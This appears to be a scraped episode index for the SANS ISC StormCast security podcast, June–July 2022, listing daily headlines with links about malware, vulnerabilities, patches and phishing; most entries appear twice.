IcedID (BokBot) with Dark VNC and Cobalt Strike https://isc.sans.edu/diary//28884 Web Assembly Crypto Miners https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html Subzero and Knotweed https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
7/28/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, July 27th, 2022

How is Your macOS Security Posture https://isc.sans.edu/diary/How+is+Your+macOS+Security+Posture%3F/28882 Registry file with Executable Payload https://www.x86matthew.com/view_post?id=embed_exe_reg Targeted Phishing of Facebook Business Users https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf Forwarding Address is Hard https://www.synacktiv.com/publications/cve-2022-31813-forwarding-addresses-is-hard.html
7/27/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, July 27th, 2022

How is Your macOS Security Posture https://isc.sans.edu/diary/How+is+Your+macOS+Security+Posture%3F/28882 Registry file with Executable Payload https://www.x86matthew.com/view_post?id=embed_exe_reg Targeted Phishing of Facebook Business Users https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf Forwarding Address is Hard https://www.synacktiv.com/publications/cve-2022-31813-forwarding-addresses-is-hard.html
7/27/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, July 26th, 2022

PowerShell Script with Fileless Capability https://isc.sans.edu/diary/PowerShell+Script+with+Fileless+Capability/28878 With Management Comes Risk: Finding Flaws in Filewave MDM https://claroty.com/2022/07/25/blog-research-with-management-comes-risk-finding-flaws-in-filewave-mdm/ CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/
7/26/20227 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, July 26th, 2022

PowerShell Script with Fileless Capability https://isc.sans.edu/diary/PowerShell+Script+with+Fileless+Capability/28878 With Management Comes Risk: Finding Flaws in Filewave MDM https://claroty.com/2022/07/25/blog-research-with-management-comes-risk-finding-flaws-in-filewave-mdm/ CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/
7/26/20227 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, July 25th, 2022

An Analysis of a Discerning Phishing Website https://isc.sans.edu/diary/An+Analysis+of+a+Discerning+Phishing+Website+/28870 Sonicwall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0007 Sh*load Exploids Episdoe V: Return of the Error https://dellfer.com/shload-exploits-episode-v-return-of-the-error/
7/25/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, July 25th, 2022

An Analysis of a Discerning Phishing Website https://isc.sans.edu/diary/An+Analysis+of+a+Discerning+Phishing+Website+/28870 Sonicwall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0007 Sh*load Exploids Episdoe V: Return of the Error https://dellfer.com/shload-exploits-episode-v-return-of-the-error/
7/25/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, July 22nd, 2022

Maldoc with non-ASCII VBA Identifiers https://isc.sans.edu/diary/Maldoc%3A+non-ASCII+VBA+Identifiers/28866 Cisco Security Updates https://tools.cisco.com/security/center/publicationListing.x? Outlook 365 Odd Supicious Login Attempt Warnings https://www.theregister.com/2022/07/21/outlook_sign_ins/ Windows RDP Brute Force Protection https://twitter.com/dwizzzleMSFT/status/1549870156771340288 Microsoft resuming blocking macros https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
7/22/20226 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, July 22nd, 2022

Maldoc with non-ASCII VBA Identifiers https://isc.sans.edu/diary/Maldoc%3A+non-ASCII+VBA+Identifiers/28866 Cisco Security Updates https://tools.cisco.com/security/center/publicationListing.x? Outlook 365 Odd Supicious Login Attempt Warnings https://www.theregister.com/2022/07/21/outlook_sign_ins/ Windows RDP Brute Force Protection https://twitter.com/dwizzzleMSFT/status/1549870156771340288 Microsoft resuming blocking macros https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
7/22/20226 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, July 21st, 2022

Malicious Python Script Behaving Like a Rubber Ducky https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860 Apple Patches Everything https://isc.sans.edu/diary/Apple+Patches+Everything+Day/28862 Confluence Atlasian Hard Coded Password https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html Zyxel Vulnerablity https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml DNS over HTTP/3 https://security.googleblog.com/2022/07/dns-over-http3-in-android.html
7/21/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, July 21st, 2022

Malicious Python Script Behaving Like a Rubber Ducky https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860 Apple Patches Everything https://isc.sans.edu/diary/Apple+Patches+Everything+Day/28862 Confluence Atlasian Hard Coded Password https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html Zyxel Vulnerablity https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml DNS over HTTP/3 https://security.googleblog.com/2022/07/dns-over-http3-in-android.html
7/21/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, July 20th, 2022

Beacon Request https://isc.sans.edu/diary/Requests+For+beacon.http-get.+Help+Us+Figure+Out+What+They+Are+Looking+For/28856 Oracle July 2022 CPU https://www.oracle.com/security-alerts/cpujul2022.html CloudMensis MacOS Spyware https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/ GPS Tracker Vulnerabilities https://www.bitsight.com/sites/default/files/2022-07/MiCODUS-GPS-Report-Final.pdf
7/20/20227 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, July 20th, 2022

Beacon Request https://isc.sans.edu/diary/Requests+For+beacon.http-get.+Help+Us+Figure+Out+What+They+Are+Looking+For/28856 Oracle July 2022 CPU https://www.oracle.com/security-alerts/cpujul2022.html CloudMensis MacOS Spyware https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/ GPS Tracker Vulnerabilities https://www.bitsight.com/sites/default/files/2022-07/MiCODUS-GPS-Report-Final.pdf
7/20/20227 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, July 19th, 2022

Adding Your Own Keywords to My PDF Tools https://isc.sans.edu/diary/Adding+Your+Own+Keywords+To+My+PDF+Tools/28852 Tor Improvements https://blog.torproject.org/new-release-tor-browser-115/ Trojan Horse Malware Password Cracker https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/ CVE-2022-33891 Apache Spark Shell Command Injection Vulnerability https://securityonline.info/cve-2022-33891-apache-spark-shell-command-injection-vulnerability/ Juniper Junos Vulnerabilities https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=[Security%20Advisories]
7/19/20226 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, July 19th, 2022

Adding Your Own Keywords to My PDF Tools https://isc.sans.edu/diary/Adding+Your+Own+Keywords+To+My+PDF+Tools/28852 Tor Improvements https://blog.torproject.org/new-release-tor-browser-115/ Trojan Horse Malware Password Cracker https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/ CVE-2022-33891 Apache Spark Shell Command Injection Vulnerability https://securityonline.info/cve-2022-33891-apache-spark-shell-command-injection-vulnerability/ Juniper Junos Vulnerabilities https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=[Security%20Advisories]
7/19/20226 minutes, 1 second
Episode Artwork

ISC StormCast for Monday, July 18th, 2022

Python: Files in Use By Another Process https://isc.sans.edu/diary/Python%3A+Files+In+Use+By+Another+Process/28848 Google Removing App Permissions List for Data Safety https://twitter.com/MishaalRahman/status/1547307555407421443 Google Play Malware https://twitter.com/IngraoMaxime/status/1547164768401858560 Faking Github Metadata https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/
7/18/20225 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, July 18th, 2022

Python: Files in Use By Another Process https://isc.sans.edu/diary/Python%3A+Files+In+Use+By+Another+Process/28848 Google Removing App Permissions List for Data Safety https://twitter.com/MishaalRahman/status/1547307555407421443 Google Play Malware https://twitter.com/IngraoMaxime/status/1547164768401858560 Faking Github Metadata https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/
7/18/20225 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, July 15th, 2022

Debugging Broadcast Storms https://isc.sans.edu/diary/A+%22DHCP+is+Broken%22+story%2C+and+a+Blast+from+the+Past+%28or+should+I+say+%22Storm%22+from+the+past%29/28844 Targeted Deanonymization via Side Channel Attacks https://leakuidatorplusteam.github.io/preprint.pdf Cookie Theft to BEC https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/ VMWare Patch https://www.vmware.com/security/advisories/VMSA-2021-0025.html
7/15/20226 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, July 15th, 2022

Debugging Broadcast Storms https://isc.sans.edu/diary/A+%22DHCP+is+Broken%22+story%2C+and+a+Blast+from+the+Past+%28or+should+I+say+%22Storm%22+from+the+past%29/28844 Targeted Deanonymization via Side Channel Attacks https://leakuidatorplusteam.github.io/preprint.pdf Cookie Theft to BEC https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/ VMWare Patch https://www.vmware.com/security/advisories/VMSA-2021-0025.html
7/15/20226 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, July 14th, 2022

Using Referrers to Detect Phishing Attacks https://isc.sans.edu/diary/Using+Referers+to+Detect+Phishing+Attacks/28836 Callback Phishing Campaigns Impersonating Security Companies https://www.crowdstrike.com/blog/callback-malware-campaigns-impersonate-crowdstrike-and-other-cybersecurity-companies/ Retbleed Spectre Attack https://comsec.ethz.ch/wp-content/files/retbleed_sec22.pdf Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706 https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Buffer Overflow Vulnerabilities in UEFI firmware of several Lenovo Notebook https://twitter.com/ESETresearch/status/1547166334651334657
7/14/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, July 14th, 2022

Using Referrers to Detect Phishing Attacks https://isc.sans.edu/diary/Using+Referers+to+Detect+Phishing+Attacks/28836 Callback Phishing Campaigns Impersonating Security Companies https://www.crowdstrike.com/blog/callback-malware-campaigns-impersonate-crowdstrike-and-other-cybersecurity-companies/ Retbleed Spectre Attack https://comsec.ethz.ch/wp-content/files/retbleed_sec22.pdf Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706 https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Buffer Overflow Vulnerabilities in UEFI firmware of several Lenovo Notebook https://twitter.com/ESETresearch/status/1547166334651334657
7/14/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, July 13th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft+July+2022+Patch+Tuesday/28838 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html SAP Patches https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 IBM Patches https://www.ibm.com/support/pages/node/6602255 https://www.ibm.com/support/pages/node/6602259 https://www.ibm.com/support/pages/node/6602251
7/13/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, July 13th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft+July+2022+Patch+Tuesday/28838 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html SAP Patches https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 IBM Patches https://www.ibm.com/support/pages/node/6602255 https://www.ibm.com/support/pages/node/6602259 https://www.ibm.com/support/pages/node/6602251
7/13/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, July 12th, 2022

Rogers Outage https://about.rogers.com/news-ideas/a-message-from-rogers-president-and-ceo/ Rolling Pwn https://rollingpwn.github.io/rolling-pwn/ GitHub Runners mine Cryptocoins https://www.trendmicro.com/en_us/research/22/g/unpacking-cloud-based-cryptocurrency-miners-that-abuse-github-ac.html SANSFIRE Keynote Stream https://www.sans.org/webcasts/the-internet-storm-center-how-to-use-and-how-to-contribute-data/
7/12/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, July 12th, 2022

Rogers Outage https://about.rogers.com/news-ideas/a-message-from-rogers-president-and-ceo/ Rolling Pwn https://rollingpwn.github.io/rolling-pwn/ GitHub Runners mine Cryptocoins https://www.trendmicro.com/en_us/research/22/g/unpacking-cloud-based-cryptocurrency-miners-that-abuse-github-ac.html SANSFIRE Keynote Stream https://www.sans.org/webcasts/the-internet-storm-center-how-to-use-and-how-to-contribute-data/
7/12/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, July 11th, 2022

SANSFIRE Keynote Stream https://www.sans.org/webcasts/the-internet-storm-center-how-to-use-and-how-to-contribute-data/ Extracting URLs from Emotet with Cyberchef https://isc.sans.edu/forums/diary/Excel%204%20Emotet%20Maldoc%20Analysis%20using%20CyberChef/28830/ Microsoft rolling Back Macro Policy Change https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805 Checkmate Ransomware Affected Poorly Configured QNAP NAS https://www.qnap.com/en/security-advisory/QSA-22-21 PyPi Requires 2FA for critical packages https://pypi.org/security-key-giveaway/
7/11/20225 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, July 11th, 2022

SANSFIRE Keynote Stream https://www.sans.org/webcasts/the-internet-storm-center-how-to-use-and-how-to-contribute-data/ Extracting URLs from Emotet with Cyberchef https://isc.sans.edu/forums/diary/Excel%204%20Emotet%20Maldoc%20Analysis%20using%20CyberChef/28830/ Microsoft rolling Back Macro Policy Change https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805 Checkmate Ransomware Affected Poorly Configured QNAP NAS https://www.qnap.com/en/security-advisory/QSA-22-21 PyPi Requires 2FA for critical packages https://pypi.org/security-key-giveaway/
7/11/20225 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, July 7th, 2022

How Many SANs are Insane https://isc.sans.edu/forums/diary/How+Many+SANs+are+Insane/28820/ Fortinet July Updates https://fortiguard.fortinet.com/psirt?date=07-2022 Phishing Attacks Getting Trickier https://www.sans.org/newsletters/ouch/phishing-attacks-getting-trickier Quantum Safe Ciphers https://csrc.nist.gov/News/2022/pqc-candidates-to-be-standardized-and-round-4 Apple Proposes Lockdown Mode https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/
7/7/20227 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, July 7th, 2022

How Many SANs are Insane https://isc.sans.edu/forums/diary/How+Many+SANs+are+Insane/28820/ Fortinet July Updates https://fortiguard.fortinet.com/psirt?date=07-2022 Phishing Attacks Getting Trickier https://www.sans.org/newsletters/ouch/phishing-attacks-getting-trickier Quantum Safe Ciphers https://csrc.nist.gov/News/2022/pqc-candidates-to-be-standardized-and-round-4 Apple Proposes Lockdown Mode https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/
7/7/20227 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, July 6th, 2022

EternalBlue 5 Years After WannaCry and NotPetya https://isc.sans.edu/forums/diary/EternalBlue+5+years+after+WannaCry+and+NotPetya/28816/ OpenSSL Patches Two Vulnerabilities https://www.openssl.org/news/secadv/20220705.txt Iconburst NPM Software Supply Chain Attack https://blog.reversinglabs.com/blog/iconburst-npm-software-supply-chain-attack-grabs-data-from-apps-websites
7/6/20226 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, July 6th, 2022

EternalBlue 5 Years After WannaCry and NotPetya https://isc.sans.edu/forums/diary/EternalBlue+5+years+after+WannaCry+and+NotPetya/28816/ OpenSSL Patches Two Vulnerabilities https://www.openssl.org/news/secadv/20220705.txt Iconburst NPM Software Supply Chain Attack https://blog.reversinglabs.com/blog/iconburst-npm-software-supply-chain-attack-grabs-data-from-apps-websites
7/6/20226 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, July 5th, 2022

7Zip Mark of the Web For Office Files https://isc.sans.edu/forums/diary/7Zip+MoW+For+Office+files/28812/ SessionManager Backdoor Seen with IIS https://securelist.com/the-sessionmanager-iis-backdoor/106868/ Googe Chrome Stable Channel Update https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
7/5/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, July 5th, 2022

7Zip Mark of the Web For Office Files https://isc.sans.edu/forums/diary/7Zip+MoW+For+Office+files/28812/ SessionManager Backdoor Seen with IIS https://securelist.com/the-sessionmanager-iis-backdoor/106868/ Googe Chrome Stable Channel Update https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
7/5/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, July 1st, 2022

Case Study: Cobalt Strike Server Lives on After its Domain is Suspended https://isc.sans.edu/forums/diary/Case+Study+Cobalt+Strike+Server+Lives+on+After+Its+Domain+Is+Suspended/28804/ CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus https://www.horizon3.ai/red-team-blog-cve-2022-28219/ CWE Top 25 Update https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html#analysis
7/1/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, July 1st, 2022

Case Study: Cobalt Strike Server Lives on After its Domain is Suspended https://isc.sans.edu/forums/diary/Case+Study+Cobalt+Strike+Server+Lives+on+After+Its+Domain+Is+Suspended/28804/ CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus https://www.horizon3.ai/red-team-blog-cve-2022-28219/ CWE Top 25 Update https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html#analysis
7/1/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, June 30th, 2022

Its New Phone Day: Time to Migrate Your MFA https://isc.sans.edu/forums/diary/Its+New+Phone+Day+Time+to+migrate+your+MFA/28800/ Managing Human Risk Security Awareness Report https://go.sans.org/lp-wp-2022-sans-security-awareness-report Microsoft Azure Service Fabric Container Elevation of Privilege Vulnerability https://unit42.paloaltonetworks.com/fabricscape-cve-2022-30137/#The-Vulnerability https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30137 Zimbra RCE Vulnerability https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/ FBI Warns of Deep Fakes Beeing Used in Job Interviews https://www.ic3.gov/Media/Y2022/PSA220628
6/30/20226 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, June 30th, 2022

Its New Phone Day: Time to Migrate Your MFA https://isc.sans.edu/forums/diary/Its+New+Phone+Day+Time+to+migrate+your+MFA/28800/ Managing Human Risk Security Awareness Report https://go.sans.org/lp-wp-2022-sans-security-awareness-report Microsoft Azure Service Fabric Container Elevation of Privilege Vulnerability https://unit42.paloaltonetworks.com/fabricscape-cve-2022-30137/#The-Vulnerability https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30137 Zimbra RCE Vulnerability https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/ FBI Warns of Deep Fakes Beeing Used in Job Interviews https://www.ic3.gov/Media/Y2022/PSA220628
6/30/20226 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, June 29th, 2022

Possible Scans for HiByMusic Devices https://isc.sans.edu/forums/diary/Possible+Scans+for+HiByMusic+Devices/28796/ OpenSSL Heap Overflow https://guidovranken.com/2022/06/27/notes-on-openssl-remote-memory-corruption/ https://github.com/openssl/openssl/issues/18625#issuecomment-1165012549 ZuoRat MalwareHijacking Home Office Routers https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/
6/29/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, June 29th, 2022

Possible Scans for HiByMusic Devices https://isc.sans.edu/forums/diary/Possible+Scans+for+HiByMusic+Devices/28796/ OpenSSL Heap Overflow https://guidovranken.com/2022/06/27/notes-on-openssl-remote-memory-corruption/ https://github.com/openssl/openssl/issues/18625#issuecomment-1165012549 ZuoRat MalwareHijacking Home Office Routers https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/
6/29/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, June 28th, 2022

Encrypted Client Hello: Anybody Using it Yet? https://isc.sans.edu/forums/diary/Encrypted+Client+Hello+Anybody+Using+it+Yet/28792/ Jenkins Advisory https://www.jenkins.io/security/advisory/2022-06-22/ Instagram Age Verification https://about.fb.com/news/2022/06/new-ways-to-verify-age-on-instagram/ CodeSys V2 Vulnerability https://github.com/ic3sw0rd/Codesys_V2_Vulnerability
6/28/20226 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, June 28th, 2022

Encrypted Client Hello: Anybody Using it Yet? https://isc.sans.edu/forums/diary/Encrypted+Client+Hello+Anybody+Using+it+Yet/28792/ Jenkins Advisory https://www.jenkins.io/security/advisory/2022-06-22/ Instagram Age Verification https://about.fb.com/news/2022/06/new-ways-to-verify-age-on-instagram/ CodeSys V2 Vulnerability https://github.com/ic3sw0rd/Codesys_V2_Vulnerability
6/28/20226 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, June 27th, 2022

Python Abusing the Windows GUI https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/ Malicious Code Passed to PowerShell via the Clipboard https://isc.sans.edu/forums/diary/Malicious+Code+Passed+to+PowerShell+via+the+Clipboard/28784/ Attacking With WebView2 Applications https://mrd0x.com/attacking-with-webview2-applications/ Bronze Starlight Ransomware Operations Use Hui Loaders https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader Novel Exploit Detected in Mitel VoIP Appliance https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499
6/27/20227 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, June 27th, 2022

Python Abusing the Windows GUI https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/ Malicious Code Passed to PowerShell via the Clipboard https://isc.sans.edu/forums/diary/Malicious+Code+Passed+to+PowerShell+via+the+Clipboard/28784/ Attacking With WebView2 Applications https://mrd0x.com/attacking-with-webview2-applications/ Bronze Starlight Ransomware Operations Use Hui Loaders https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader Novel Exploit Detected in Mitel VoIP Appliance https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499
6/27/20227 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, June 23rd, 2022

Malicious PowerShell Targeting Cryptocurrency Browser Extensions https://isc.sans.edu/forums/diary/Malicious+PowerShell+Targeting+Cryptocurrency+Browser+Extensions/28772/ Keeping PowerShell: Security Measures to Use and Embrace https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/1/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF Client-Side Magecart Attacks Still Around, But More Covert https://blog.malwarebytes.com/threat-intelligence/2022/06/client-side-magecart-attacks-still-around-but-more-covert/ Chinese actor takes aim, armed with Nim Language and Bizarro AES https://research.checkpoint.com/2022/chinese-actor-takes-aim-armed-with-nim-language-and-bizarro-aes/ Israeli Air Raid Sirens Hacked https://twitter.com/Israel_Cyber/status/1538821467785265153
6/23/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, June 23rd, 2022

Malicious PowerShell Targeting Cryptocurrency Browser Extensions https://isc.sans.edu/forums/diary/Malicious+PowerShell+Targeting+Cryptocurrency+Browser+Extensions/28772/ Keeping PowerShell: Security Measures to Use and Embrace https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/1/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF Client-Side Magecart Attacks Still Around, But More Covert https://blog.malwarebytes.com/threat-intelligence/2022/06/client-side-magecart-attacks-still-around-but-more-covert/ Chinese actor takes aim, armed with Nim Language and Bizarro AES https://research.checkpoint.com/2022/chinese-actor-takes-aim-armed-with-nim-language-and-bizarro-aes/ Israeli Air Raid Sirens Hacked https://twitter.com/Israel_Cyber/status/1538821467785265153
6/23/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, June 22nd, 2022

Experimental New Domain / Domain Age API https://isc.sans.edu/forums/diary/Experimental+New+Domain+Domain+Age+API/28770/ Forescout Vedere Labs Discovers 56 OT Vulnerabilities https://www.forescout.com/resources/ot-icefall-report/ Cloudflare Outage https://blog.cloudflare.com/cloudflare-outage-on-june-21-2022/ Does Acrobat Reader Unload Injection of Security Products https://blog.minerva-labs.com/does-acrobat-reader-unload-injection-of-security-products 7-Zip Mark-of-the-Web Support https://www.7-zip.org/history.txt
6/22/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, June 22nd, 2022

Experimental New Domain / Domain Age API https://isc.sans.edu/forums/diary/Experimental+New+Domain+Domain+Age+API/28770/ Forescout Vedere Labs Discovers 56 OT Vulnerabilities https://www.forescout.com/resources/ot-icefall-report/ Cloudflare Outage https://blog.cloudflare.com/cloudflare-outage-on-june-21-2022/ Does Acrobat Reader Unload Injection of Security Products https://blog.minerva-labs.com/does-acrobat-reader-unload-injection-of-security-products 7-Zip Mark-of-the-Web Support https://www.7-zip.org/history.txt
6/22/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, June 21st, 2022

Odd TCP Fast Open Packets https://isc.sans.edu/forums/diary/Odd+TCP+Fast+Open+Packets+Anybody+understands+why/28766/ DFSCoerce NTLM Relay Attack https://github.com/Wh04m1001/DFSCoerce https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429 Windows Emergency Update Fixes Microsoft 365 Issues on ARM Devices https://www.bleepingcomputer.com/news/microsoft/windows-emergency-update-fixes-microsoft-365-issues-on-arm-devices/ Safari Vulnerability Analysis https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html Internet Explorer Remnants Still an Issue https://www.darkreading.com/vulnerabilities-threats/internet-explorer-will-likely-remain-an-attacker-target-for-some-time
6/21/20225 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, June 21st, 2022

Odd TCP Fast Open Packets https://isc.sans.edu/forums/diary/Odd+TCP+Fast+Open+Packets+Anybody+understands+why/28766/ DFSCoerce NTLM Relay Attack https://github.com/Wh04m1001/DFSCoerce https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429 Windows Emergency Update Fixes Microsoft 365 Issues on ARM Devices https://www.bleepingcomputer.com/news/microsoft/windows-emergency-update-fixes-microsoft-365-issues-on-arm-devices/ Safari Vulnerability Analysis https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html Internet Explorer Remnants Still an Issue https://www.darkreading.com/vulnerabilities-threats/internet-explorer-will-likely-remain-an-attacker-target-for-some-time
6/21/20225 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, June 20th, 2022

Critical Vulnerability in Splunk Enterprise Deployment Server Functionality https://isc.sans.edu/forums/diary/Critical+vulnerability+in+Splunk+Enterprises+deployment+server+functionality/28760/ Malspam Pushes Matanbuchus Malware Leads to Cobalt Strike https://isc.sans.edu/forums/diary/Malspam+pushes+Matanbuchus+malware+leads+to+Cobalt+Strike/28752/ Proofpoint Discovers Potentially Dangerous Office 365 Functionality https://www.proofpoint.com/us/blog/cloud-security/proofpoint-discovers-potentially-dangerous-microsoft-office-365-functionality
6/20/20228 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, June 20th, 2022

Critical Vulnerability in Splunk Enterprise Deployment Server Functionality https://isc.sans.edu/forums/diary/Critical+vulnerability+in+Splunk+Enterprises+deployment+server+functionality/28760/ Malspam Pushes Matanbuchus Malware Leads to Cobalt Strike https://isc.sans.edu/forums/diary/Malspam+pushes+Matanbuchus+malware+leads+to+Cobalt+Strike/28752/ Proofpoint Discovers Potentially Dangerous Office 365 Functionality https://www.proofpoint.com/us/blog/cloud-security/proofpoint-discovers-potentially-dangerous-microsoft-office-365-functionality
6/20/20228 minutes, 34 seconds
Episode Artwork

